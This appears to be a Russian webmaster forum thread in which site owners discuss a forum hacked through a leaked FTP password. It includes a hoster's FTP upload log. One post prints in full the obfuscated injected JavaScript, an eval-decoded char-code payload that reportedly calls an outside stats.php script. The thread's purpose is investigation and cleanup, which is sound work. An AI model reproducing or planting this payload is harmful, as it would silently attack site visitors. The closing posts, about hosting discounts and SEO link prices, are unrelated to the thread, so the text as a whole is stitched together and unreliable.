Вычистил все. И все таки пока уверен, что именно логин и пароль от ФТП ушел. Уже достаточно давно никаких хаков на Воблу на ставил, на Диафан тем более. Но логин и пароль были у 2-3-х человек которые принимали участие в разработке. Я протормозил и не сменил его. Да еще и ftpaccess у меня был отключен, чтобы люди могли зайти. Фатальный тупизм, так же как и не поставил скрипт, который мониторит размер указанных файлов.---------- Добавлено 28.01.2013 в 22:10 ----------Кстати я не один такой. И что интересно, много сайтов в Хетзнер находится, через fastvps
Хотя все подряд не проверял. Правда у меня в Зеноне ресуры.
Да.
Абсолютно точно!
Домен не зарегистрирован.
Интересно, а сам сайт где находится скрипт, тоже взломан? Может обратиться к владельцам, чтобы они разобрались с безопасностью сайта и заодно прислали php файл?
Но по идеи, ничего более паролей утащить не могли? Т.е. только с форума, если человек к себе в почту перешел с форума, уже не утянут данные?
arkadiy_a, менять всем пользователям форума пароли или можно обойтись менее суровой мерой?---------- Добавлено 28.01.2013 в 21:35 ----------Интересный код выдался, когда перешел по ссылки на этот скрипт из темы:
try{document.body*=2}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(9,8,103,99,32,39,98,108,99,116,107,98,110,115,44,100,101,115,67,105,101,108,99,107,116,114,64,118,84,96,101,75,97,108,99,37,39,97,109,97,121,38,39,88,48,92,39,120,13,8,7,6,105,101,112,94,109,100,112,37,41,58,11,6,9,124,30,98,108,114,99,29,123,12,7,6,9,99,109,96,117,108,99,107,116,45,117,111,105,115,99,37,34,59,103,99,114,96,107,98,32,114,112,96,61,38,102,113,116,111,56,44,47,116,108,112,117,97,113,96,114,104,96,98,100,45,113,94,102,100,101,114,97,113,98,102,110,102,110,108,114,100,116,102,118,104,108,100,104,112,114,43,111,113,101,44,109,104,114,111,97,94,96,94,115,115,95,111,100,114,93,104,114,104,106,105,39,31,117,102,100,115,102,58,39,48,46,45,39,31,102,98,105,102,102,113,61,38,47,45,48,38,30,112,116,120,106,98,61,38,117,102,100,115,102,55,49,47,46,109,120,58,102,98,105,102,102,113,58,48,46,45,112,119,57,109,111,114,103,113,105,110,108,55,97,97,113,108,108,116,114,98,59,117,103,112,105,97,103,105,105,115,119,55,104,104,98,97,101,109,57,105,101,101,114,55,45,48,46,45,48,47,110,117,59,115,109,109,58,47,57,36,62,59,45,102,102,113,95,106,101,61,32,38,59,12,7,6,125,12,7,6,102,116,108,96,116,104,109,107,32,104,100,111,97,108,99,111,40,40,121,10,9,8,7,115,97,113,30,99,32,60,30,97,111,98,115,106,101,109,114,43,99,113,99,94,116,100,67,105,101,108,99,107,116,39,37,102,102,113,95,106,101,38,39,56,102,45,113,98,116,64,114,113,114,104,96,114,116,100,38,36,115,113,97,36,44,38,102,113,116,111,56,44,47,116,108,112,117,97,113,96,114,104,96,98,100,45,113,94,102,100,101,114,97,113,98,102,110,102,110,108,114,100,116,102,118,104,108,100,104,112,114,43,111,113,101,44,109,104,114,111,97,94,96,94,115,115,95,111,100,114,93,104,114,104,106,105,39,40,57,99,46,114,114,118,108,100,44,105,101,101,114,58,39,44,47,45,48,47,46,109,120,38,57,99,46,114,114,118,108,100,44,115,105,114,103,95,105,107,103,113,121,60,37,101,105,99,98,98,110,38,57,99,46,114,114,118,108,100,44,113,111,111,59,36,48,38,57,99,46,114,114,118,108,100,44,109,111,114,103,113,105,110,108,58,39,96,96,112,111,107,115,113,101,38,57,99,46,114,114,118,108,100,44,113,111,111,59,36,48,38,57,99,46,114,99,113,65,115,114,111,105,97,115,113,101,39,37,116,105,99,114,101,39,43,37,46,48,47,37,38,59,101,44,112,101,115,63,113,116,113,103,95,117,115,99,37,39,103,99,102,103,103,114,36,44,38,47,45,48,38,39,56,13,8,7,6,100,110,97,114,109,100,108,113,46,102,99,113,69,107,99,106,101,109,114,112,66,120,82,94,103,77,95,106,101,39,37,95,111,99,119,36,41,90,46,90,46,96,110,109,101,109,98,64,104,104,106,97,40,101,39,56,13,8,7,122);}w=f;s=[];for(i=0;-i+708!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+e("j%4")));}xz=e;xz(s)}
Что это может быть или непонятно?
В смысле не вяжется?
Так, еще раз. Это js что делает? Не только же обращение к http://grandsteel.kz/stats.php или как раз это он и делает, а что уже делает скрипт stats.php неизвестно?
Скорее логин от ФТП ушел, тупанул я. Несколько человек имели логин и пароль, когда сайт запускал и не сменил его, все откладывал, дооткладывался.
Кусок лога, что прислал хостер:
Jan 28 12:57:56 zvm28 proftpd[18391]: PROFTPD-XFER|diafan@domen.ru|RETR forum.domen.ru/www/robots.txt|/ch2/bhome/part3/03/vh36361/forum.domen.ru/www/robots.txt Jan 28 12:59:18 zvm28 proftpd[18391]: PROFTPD-XFER|diafan@domen.ru|RETR forum.domen.ru/www/includes/xml/cpnav_vbseo_sitemap.xml|/ch2/bhome/part3/03/vh36361/forum.domen.ru/www/includes/xml/cpnav_vbseo_sitemap.xml Jan 28 12:59:27 zvm28 proftpd[18391]: PROFTPD-XFER|diafan@domen.ru|STOR forum.domen.ru/www//GqvWbYyF.gif|/ch2/bhome/part3/03/vh36361/forum.domen.ru/www/GqvWbYyF.gif Jan 28 12:59:27 zvm28 proftpd[18391]: PROFTPD-XFER|diafan@domen.ru|SITE CHMOD 777 forum.domen.ru/www//GqvWbYyF.gif|/ch2/bhome/part3/03/vh36361/forum.domen.ru/www//GqvWbYyF.gif Jan 28 12:59:27 zvm28 proftpd[18391]: PROFTPD-XFER|diafan@domen.ru|DELE forum.domen.ru/www//GqvWbYyF.gif|/ch2/bhome/part3/03/vh36361/forum.domen.ru/www//GqvWbYyF.gif
Все таки, что это код залитый делает?
Но при этом просто при обращение по адресу папки, аутентификация вылезает. Или так и должно быть? nginx установлен.
rustelekom, ваша компания единственная, кто делает реальные скидки, в отличии от остальных участников, которые только объявили о скидках, а по факту ничего не сделали. Молодцы! Хоть кто-то реально работает, а не лохов ищет.
15000 это минимум 30 "вечных" ссылок с весьма качественных ресурсов. Кто-то серьезно полагает, что нахождение в каталоге Яндекса сильнее чем 30 ссылок?
